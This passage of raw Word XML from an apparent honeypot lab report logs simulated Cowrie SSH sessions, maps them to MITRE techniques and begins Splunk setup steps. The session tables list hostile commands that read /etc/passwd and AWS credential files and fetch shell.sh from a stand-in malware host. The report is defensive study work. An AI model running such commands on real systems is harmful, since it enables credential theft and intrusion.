      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/FILENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079FD6C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="61FD63DB" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="266E978F" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="66F2AA15" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5CDF8C10" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="38952C98" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="3B6E0142" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="36AC69F5" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="3E81775D" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="6B10B826" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="4A52DEC5" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="5D30BCE6" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="57BAF25E" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="0383169E" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="41C625A8" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="575A532B" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="52FBE748" w14:textId="614A9CA9" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc231686569"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 Attacker Activity Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="24E4A733" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session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17D17014"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72EF1489" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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58F3B0C6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="43FDA1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C56211" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Session Date &amp; Time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75005DC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>05/06/2026 at 22:38:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="50278C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17C77C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker IP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4CCB7E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.26 (Kali machine — lab simulation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="4EE0BA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8550B27" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Country of Origin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99A878" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab simulation — Kali VM (192.168.56.0/24 internal network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="32A5B7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51D9E9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Username Attempted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218986" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1F304F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A748086" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password Used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735FD6" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root, password, 123456, admin (cycled repeatedly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0D76A0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6071BC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Login Successful?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F7FB75" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Yes — all credentials accepted by Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="36E52A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AEEB4E8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Commands Typed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29EF335" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /etc/passwd, cat /etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /home/admin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/credentials, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://malware.example.com/shell.sh, exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="225818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A2C9FA" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Files Downloaded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2B25DB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">None — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> failed (domain does not resolve)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5FF37F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8B3AD53" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE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00D0E8A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110, T1082, T1033, T1087, T1552, T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="215C66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65A028" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker Goal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BDD335" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileged access via credential stuffing, followed by full system and credential reconnaissance targeting database and cloud infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70CE88B1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="3E5EE8E2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session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61542CE9"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5A19063C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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0D11075D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="0AD1D7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54BD456" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Session Date &amp; Time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91DE472" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>05/06/2026 at 22:38:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="498E34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3EC3B4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker IP Address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E6927B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.56.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="07D855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F71A4DB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Country of Origin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5CE5679" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab simulation — Kali VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="640DF2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66E83C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Username Attempted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E7F0CF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="44C2EA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6253532" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Password Used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C76630E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root, password, 123456, admin (cycled repeatedly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="68F8E5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9D9A63" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Login Successful?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386EA1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="164BB0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F962A4B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Commands Typed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EE15A23" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /etc/passwd, cat /etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, cat /home/admin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/credentials, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://malware.example.com/shell.sh, exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="2BB1AA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CC879D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Files Downloaded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7B8BDE" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">None — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attempted but domain failed to resolve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="5DA4C5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9F8FEE1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Techniques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056D135" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110, T1082, T1033, T1087, T1552, T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="010F58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36EB60" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker Goal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F07041" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Post-login reconnaissance and credential harvesting — system identification followed by database and cloud credential access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44B6021F" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="6A09C415" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="69BECBA9" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="157C4851" w14:textId="670353E5" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc231686570"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Attack Analysis Observations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="5BEEFD54" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-login analysis confirmed a methodical, intelligence-driven attack pattern. The first command executed was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — immediate system reconnaissance consistent with T1082, establishing environmental awareness before deploying further tools. Every subsequent command mapped to the Discovery tactic: T1033 (user identification), T1087 (account enumeration), and T1552 (credential harvesting) — confirming attackers survey comprehensively before escalating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79584D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The simulated source IP (192.168.56.26) returned no AlienVault OTX results, as expected for a private network address. In a public deployment, OTX would typically surface attacker geolocation, associated threat groups, and cross-organisational attack history — intelligence that transforms individual honeypot data into actionable threat attribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D8B8B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F19DC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc231686571"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. SIEM Integration &amp; Attack Dashboard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="746E17D3" w14:textId="0DBF12C9" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc231686572"/>
      <w:r>
        <w:t>5.1 Install Splunk Enterprise on Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="3E94E7F2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc231686573"/>
      <w:r>
        <w:t>Step 1 — Download Splunk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="71931723"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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splunk.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'https://download.splunk.com/products/splunk/releases/10.4.0/linux/splunk-10.4.0-f798d4d49089-linux-amd64.deb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB8CF5" w14:textId="610C3B39" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify the download URL against the current release at splunk.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en_us</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C8B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/download/splunk-enterprise.html before executing — Splunk release hashes change with each version update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B5492" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="2938160B" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc231686574"/>
      <w:r>
        <w:t>Step 2 — Install Splunk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="67B275E4"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dpkg</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i</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splunk.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44619A1F"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/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
